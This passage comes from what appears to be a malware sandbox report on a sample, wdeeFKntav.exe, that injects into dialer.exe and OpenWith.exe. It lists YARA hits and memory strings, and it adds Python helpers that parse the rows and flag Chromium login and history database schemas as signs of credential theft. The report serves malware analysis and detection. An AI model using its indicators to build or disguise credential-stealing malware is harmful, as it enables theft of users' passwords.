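Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://discord.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49723 -> 443 |
"""

PROC_RE = re.compile(r"[\w.-]+\.exe")          # process names in a Source cell
URL_SPLIT = re.compile(r"(?=https?://)")       # two URLs glued together split here
FLOW_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")


def parse_report(text):
    """Pair each 'Source:' row with the finding row that follows it."""
    records, source = [], None
    for raw in text.splitlines():
        line = raw.strip().rstrip("|").strip()
        if line.startswith("Source:"):
            source = line[len("Source:"):].strip()
        elif source is not None and line:
            records.append((source, line))
            source = None
    return records


def _canonical(url, universe):
    """Fold a URL onto the shortest other URL it merely extends with junk.

    A real path or query continuation ('/', '?', '#') is a different URL and is
    left alone; any other trailing bytes after a complete URL are an over-read.
    """
    candidates = [u for u in universe
                  if u != url and url.startswith(u) and url[len(u)] not in "/?#"]
    return min(candidates, key=len) if candidates else url


def extract_urls(records):
    """Map canonical URL -> set of processes whose memory held it."""
    raw = defaultdict(set)
    for source, finding in records:
        if not finding.startswith("String found in binary or memory:"):
            continue
        blob = finding.split(":", 1)[1].strip()
        for url in filter(None, URL_SPLIT.split(blob)):
            raw[url].update(PROC_RE.findall(source))
    folded = defaultdict(set)
    for url, procs in raw.items():
        folded[_canonical(url, raw)].update(procs)
    return dict(folded)


def ip_literal_urls(urls):
    """URLs whose host is a bare IP address (no DNS involved, typical of beacons)."""
    hits = []
    for url in urls:
        try:
            ip_address(urlsplit(url).hostname)
            hits.append(url)
        except ValueError:
            pass
    return sorted(hits)


def extract_flows(records, server_port=443):
    """Map client port -> {'out', 'in'} from the per-direction traffic rows."""
    flows = defaultdict(set)
    for _, finding in records:
        m = FLOW_RE.search(finding)
        if not m:
            continue
        src, dst = int(m.group(1)), int(m.group(2))
        if dst == server_port:
            flows[src].add("out")
        elif src == server_port:
            flows[dst].add("in")
    return dict(flows)
```

Run over the full row set, the script shows that the bare-IP URL is the only one held by both dialer.exe and OpenWith.exe, the search-engine and Discord URLs sit in OpenWith.exe alone, and every port row is one direction of a TLS session from an ephemeral port in the 49699 to 49723 range to port 443. The rows by themselves do not tie those sessions to a destination address; the IP literal recovered from memory is the value to check against the capture.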
Source: Yara match |
File source: 0.3.wdeeFKntav.exe.45c0000.6.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.dialer.exe.4fd0000.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.dialer.exe.4db0000.6.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.3.wdeeFKntav.exe.47e0000.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.dialer.exe.4fd0000.7.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.3.wdeeFKntav.exe.47e0000.7.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.3.wdeeFKntav.exe.45c0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.3.wdeeFKntav.exe.45c0000.6.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: wdeeFKntav.exe PID: 5804, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: dialer.exe PID: 3544, type: MEMORYSTR |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B168230C7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor, |
3_3_0000025B168230C7 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_0000025B14E215AC NtAcceptConnectPort, |
3_2_0000025B14E215AC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_0000025B14E20AC8 NtAcceptConnectPort,NtAcceptConnectPort, |
3_2_0000025B14E20AC8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_0000025B14E21CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification, |
3_2_0000025B14E21CD0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_0000025B14E21A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, |
3_2_0000025B14E21A90 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F059F40 NtAcceptConnectPort, |
3_2_00007DF41F059F40 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F058D94 NtAcceptConnectPort, |
3_2_00007DF41F058D94 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F058C90 NtAcceptConnectPort, |
3_2_00007DF41F058C90 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F059CA0 _calloc_dbg,NtAcceptConnectPort, |
3_2_00007DF41F059CA0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F058C08 NtAcceptConnectPort, |
3_2_00007DF41F058C08 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F059AF4 _malloc_dbg,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z, |
3_2_00007DF41F059AF4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F058AFC NtAcceptConnectPort, |
3_2_00007DF41F058AFC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F058A40 NtAcceptConnectPort, |
3_2_00007DF41F058A40 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F05A600 NtAcceptConnectPort, |
3_2_00007DF41F05A600 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F05A540 NtAcceptConnectPort, |
3_2_00007DF41F05A540 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F05A2B0 NtAcceptConnectPort, |
3_2_00007DF41F05A2B0 |
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Code function: 0_2_00CC0AA0 |
0_2_00CC0AA0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B16825E7C |
3_3_0000025B16825E7C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B1682557C |
3_3_0000025B1682557C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B168258FC |
3_3_0000025B168258FC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B1682279C |
3_3_0000025B1682279C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B16821BA6 |
3_3_0000025B16821BA6 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B16824A38 |
3_3_0000025B16824A38 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B16822C3C |
3_3_0000025B16822C3C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_3_0000025B168224F7 |
3_3_0000025B168224F7 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_0000025B14E20C5C |
3_2_0000025B14E20C5C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F045BD8 |
3_2_00007DF41F045BD8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F04BEC4 |
3_2_00007DF41F04BEC4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F07CEC4 |
3_2_00007DF41F07CEC4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F0A6F20 |
3_2_00007DF41F0A6F20 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F11CF3C |
3_2_00007DF41F11CF3C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F113DE0 |
3_2_00007DF41F113DE0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F089E68 |
3_2_00007DF41F089E68 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F117CF4 |
3_2_00007DF41F117CF4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F088BE8 |
3_2_00007DF41F088BE8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F031BFC |
3_2_00007DF41F031BFC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F040C44 |
3_2_00007DF41F040C44 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F05EC44 |
3_2_00007DF41F05EC44 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F096B20 |
3_2_00007DF41F096B20 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F08A9C4 |
3_2_00007DF41F08A9C4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F096A10 |
3_2_00007DF41F096A10 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F034A14 |
3_2_00007DF41F034A14 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F084A14 |
3_2_00007DF41F084A14 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1158AC |
3_2_00007DF41F1158AC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1178D8 |
3_2_00007DF41F1178D8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F07F954 |
3_2_00007DF41F07F954 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F0577A0 |
3_2_00007DF41F0577A0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F0717C4 |
3_2_00007DF41F0717C4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F07C7E8 |
3_2_00007DF41F07C7E8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F10780C |
3_2_00007DF41F10780C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F04D850 |
3_2_00007DF41F04D850 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F096834 |
3_2_00007DF41F096834 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F087860 |
3_2_00007DF41F087860 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F04D688 |
3_2_00007DF41F04D688 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F0CB68C |
3_2_00007DF41F0CB68C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1246F8 |
3_2_00007DF41F1246F8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F118750 |
3_2_00007DF41F118750 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F09F4FC |
3_2_00007DF41F09F4FC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F088534 |
3_2_00007DF41F088534 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1173A0 |
3_2_00007DF41F1173A0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1183B8 |
3_2_00007DF41F1183B8 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F0AA3F4 |
3_2_00007DF41F0AA3F4 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F03E414 |
3_2_00007DF41F03E414 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F07C45C |
3_2_00007DF41F07C45C |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F067318 |
3_2_00007DF41F067318 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F043314 |
3_2_00007DF41F043314 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1241DC |
3_2_00007DF41F1241DC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F1111BC |
3_2_00007DF41F1111BC |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F07D210 |
3_2_00007DF41F07D210 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F118238 |
3_2_00007DF41F118238 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F0D40A0 |
3_2_00007DF41F0D40A0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F09B094 |
3_2_00007DF41F09B094 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F096F78 |
3_2_00007DF41F096F78 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F086FA0 |
3_2_00007DF41F086FA0 |
Source: C:\Windows\System32\OpenWith.exe |
Code function: 3_2_00007DF41F10C01C |
3_2_00007DF41F10C01C |
Source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000046E3000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameKernelbase.dllj% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2112870082.0000000004652000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenamekernel32j% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000000.2073258965.0000000000CDB000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameTCPZ.exe, vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2112932104.0000000004730000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenamekernel32j% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2113264458.00000000049C1000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameKernelbase.dllj% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2112323721.0000000004936000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2111775317.0000000004738000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \[FileVersionProductVersionFileDescriptionCompanyNameProductNameOriginalFilenameInternalNameLegalCopyright vs wdeeFKntav.exe |
Source: wdeeFKntav.exe, 00000000.00000003.2112684749.000000000488D000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenamentdll.dllj% vs wdeeFKntav.exe |
Source: wdeeFKntav.exe |
Binary or memory string: OriginalFilenameTCPZ.exe, vs wdeeFKntav.exe |
Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, CallWrapper.cs |
Suspicious method names: .CallWrapper.GetPayload |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence'; |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q); |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0 |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s; |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s; |
Source: OpenWith.exe, 00000003.00000003.2320449048.0000025B16DB7000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16DB8000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: CREATE TABLE sqlite_sequence(name,seq) AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)framework; |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); |
Source: OpenWith.exe, 00000003.00000003.2319637690.0000025B1705F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17020000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319529034.0000025B1705F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2330694334.0000025B17000000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2330260861.0000025B17050000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key)); |
Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' |
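Two different things are mixed in the SQL text above. Statements carrying %Q/%s/%w placeholders or the vacuum_db and sqlite_rename_* helpers are the sqlite3 library's own source text and appear in any binary that statically embeds SQLite; they show only that the payload ships SQLite. The two CREATE TABLE statements are the schema of Chromium profile databases (the History `urls` table columns in one row, the Login Data `password_notes` table in another), and SQLite reads a database's CREATE statements from sqlite_master only when that file is opened, so their presence in OpenWith.exe memory is evidence that those profile files were opened. The following added example, not part of the report, sorts the strings on that basis; the SAMPLE list is copied from the rows above (the History statement as recovered, with two schema fragments run together) and the fingerprint rules are the example's own.

```python
"""Sort SQL text recovered from process memory into "embedded SQLite library
text" versus "schema of a browser profile database that was opened".

Added example, not part of the sandbox report. SAMPLE is copied from the
memory strings listed above. The fingerprint rules are this example's own.
"""
import re
from collections import Counter

SAMPLE = [
    "SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';",
    "INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);",
    'UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;',
    "UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;",
    # Recovered as-is: the sqlite_sequence DDL and the tail of Chromium's History
    # `urls` table DDL were run together by the string scanner.
    "CREATE TABLE sqlite_sequence(name,seq) AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)framework;",
    "CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));",
    "SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'",
]

# Column/table names that identify Chromium profile databases. All needles of a
# fingerprint must be present; the sets are the example's own choice.
PROFILE_FINGERPRINTS = {
    "chromium-login-data": ("password_notes", "REFERENCES logins"),
    "chromium-history": ("visit_count", "typed_count", "last_visit_time"),
}

# Text that only occurs inside sqlite3's own source: internal helper names and
# the sqlite3_mprintf placeholders (%Q, %q, %w, %s, %z, %d) it formats SQL with.
LIBRARY_MARKERS = ("vacuum_db", "sqlite_rename_", "sqlite_temp_master")
FORMAT_PLACEHOLDER = re.compile(r"%[Qqwszd]")


def classify(stmt):
    """Label one recovered SQL string."""
    for label, needles in PROFILE_FINGERPRINTS.items():
        if all(n in stmt for n in needles):
            return label
    if any(m in stmt for m in LIBRARY_MARKERS) or FORMAT_PLACEHOLDER.search(stmt):
        return "sqlite-internal"
    return "unknown"


def summarize(stmts):
    """Count strings per label."""
    return Counter(classify(s) for s in stmts)


def profile_evidence(stmts):
    """Only the strings that indicate a browser profile database was opened."""
    return [s for s in stmts if classify(s).startswith("chromium-")]
```

The useful output is `profile_evidence`: for this sample it returns exactly the two CREATE TABLE strings, which is the part of the SQL text worth carrying into a report, while the five library statements are noise that every SQLite-embedding program produces.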
Source: C:\Users\user\Desktop\wdeeFKntav.exe |
Section loaded: apphelp.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: tapi32.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: wbemcomn.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: amsi.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: userenv.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: profapi.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: version.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: uxtheme.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: windows.storage.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: wldp.dll |
Source: C:\Windows\SysWOW64\dialer.exe |
Section loaded: sspicli.dll |
